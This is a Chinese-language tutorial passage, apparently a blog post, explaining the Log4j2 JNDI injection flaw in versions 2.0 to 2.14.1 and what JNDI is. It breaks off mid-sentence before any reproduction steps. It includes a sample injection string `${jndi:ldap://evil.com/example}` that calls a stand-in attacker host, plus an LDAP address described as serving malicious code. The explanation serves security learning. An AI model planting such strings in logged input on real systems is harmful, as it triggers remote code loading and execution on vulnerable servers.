log4j2漏洞原理详解、漏洞复现及漏洞利用

一、Apache Log4j2介绍

Apache Log4j2 是 Java 语言的日志处理套件,使用极为广泛。在其 2.0 到 2.14.1 版本中存在一处 JNDI 注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的参数进行 JNDI 注入,执行任意代码。

什么是 JNDI?

Java 命名和目录接口(Java Naming and Directory Interface,缩写 JNDI),是 Java 的一个目录服务应用程序接口(API),它提供一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。

通俗一点来讲 JNDI 可以远程加载 LDAP 或 RMI 服务端提供的恶意代码注入并执行。

以 LDAP 方式

LDAP:ldap://127.0.0.1/payload 提供恶意代码。

Log4j2 是一个日志处理框

你可能感兴趣的:(网络安全全栈课程,vulhub靶场通关,log4j,java,漏洞复现)